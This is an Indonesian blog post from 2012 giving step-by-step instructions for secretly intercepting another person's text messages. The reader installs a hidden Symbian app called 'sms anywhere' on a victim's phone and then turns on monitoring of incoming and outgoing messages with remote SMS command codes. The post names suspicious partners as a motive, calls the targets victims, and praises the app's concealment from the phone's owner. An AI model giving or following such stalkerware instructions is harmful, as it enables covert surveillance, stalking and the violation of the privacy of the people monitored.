Berbagi itu indah, yuk kita bersedekah

LightBlog
LightBlog

Tuesday 1 May 2012

Cara Menyadap Sms Orang Lain

Kali ini Wahyu akan mencoba share cara menyadap sms orang lain dengan menggunakan aplikasi yang namanya sms anywhere. Mugkin saja kalian curiga sama pacar atau siapapun dan ingin megetahui sms yang keluar atau masuk.Cara menyadap sms orang lain ini bener-bener manteb dan mudah bro. Pada dasarnya aplikasi penyadap sms yang akan wahyu share adalah aplikasi yang berformat .sis, maksudnya hanya bisa dipasang di ponsel atau hp symbian (nokia/s60v2).Mau tau gimana cara menyadap sms orang lain dengan aplikasi? Ok langsug aja gan!

Berikut caranya. Dowload dulu aplikasi penyadap smsnya disini.

1. Instal aplikasi tersebut di ponsel korban.

2. Setelah terinstal sobat tidak akan menemukan aplikasi tersebut. Kenapa? Gak usah banyak tanya langsung aja simak petunjuk berikutnya. toh itu juga keuntungan buat kita. Aplikasinya kan jadi gak diketahui pemilik hp.

3. Aktifkan aplikasi tersebut dengan mengirim sms ke nomor ponsel korban yang sudah terpasang aplikasi penyadap sms tadi. Caranya ketik SA (password) ON. Contoh: SA wahyuganteng ON. (Pass minimal 8 karakter). Kalau mau dimatikan penyadapnya tinggal ganti kata ON menjadi OFF.

4. Kalau sobat ingin meyadapnya sms masuk tinggal kirim sms lagi ke nomor korban dengan format SA (password) R1. Contoh: SA wahyuganteng R1. Untuk mematikannya ganti R1 menjadi R0 (nol). Untuk sms keluar sobat juga perlu mengaktifkannya dengan cara mengirim sms dengan format SA (password) S1. Untuk mematikan silakan ganti S1 dengan S0.

Sekarang sobat tinggal menunggu sms keluar ataupun masuk dari hp korban tadi. Gimana? Mudahkan cara menyadap sms orang lain dengan aplikasi sms anywhere? Selamat mencoba dan jangan disalah gunakan ya.
Adbox